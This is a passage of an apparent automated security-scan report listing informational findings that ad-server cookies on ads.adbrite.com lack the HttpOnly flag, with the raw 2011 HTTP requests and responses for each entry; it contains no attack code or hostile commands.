Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjkKBjY4NDMzORijmeS6DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUKMAoGNzYyNzAxGJL7-s0TIiA0OTUyNkIxQjNGREQwM0ZCQzE0RERDNTAwODlCQzg1MAohCgY3NzkwNDUYp4v6zRMiETE3NjA4ODQzOTEzMTMyNTM0CjQKBjgwNjIwNRj10Pi3GCIkMzcyOGU3NGMtNzQ2MS0xMWUwLTkxODUtMDAyNTkwMDlhOWU0EAE; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx"; rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRjqq-S6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Set-Cookie: rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Content-Length: 0


17.64. http://ads.adbrite.com/adserver/vdi/682865

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRi5teS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq01"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csN4X%2B1RRbboRM1jdIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRimxOS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:38 GMT
Set-Cookie: ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csO45ntUkS06sa9idIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:09:38 GMT
Content-Length: 0


17.65. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjkKBjY4NDMzORjps8q7DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.66. http://ads.adbrite.com/adserver/vdi/711384

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:04:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://a.triggit.com/pxabcm?abid=MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBjlpurNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:04:56 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:04:56 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:04:56 GMT
Content-Length: 0


17.67. http://ads.adbrite.com/adserver/vdi/762701

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.68. http://ads.adbrite.com/adserver/vdi/779045

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CiEKBjc3OTA0NRjjmuLOEyIRMTc2MDg4NDM5MTMxMzI1MzQQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
Set-Cookie: rb=0:779045:20861280:17608843913132534:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.69. http://ads.adbrite.com/adserver/vdi/806205

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:39:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://d.chango.com/m/s/AdBrite?partner_uid=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY7bvluBgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Set-Cookie: rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Content-Length: 0


17.70. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=about%3Ablank&zx=57&zy=158&ww=0&wh=0&fl=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads2.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 02:35:06 GMT
Set-Cookie: b="%3A%3A12ggb"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 02:35:06 GMT
Set-Cookie: rb2=EAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:35:06 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMnMzawxrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:35:06 GMT
Set-Cookie: fq="876fb%2C1uo0%7Clkjr6i"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:35:06 GMT
Content-Length: 1630

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://new-electronic-cigarette.com/ab.php\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href
...[SNIP]...

17.71. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794248&zs=3330305f323530&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
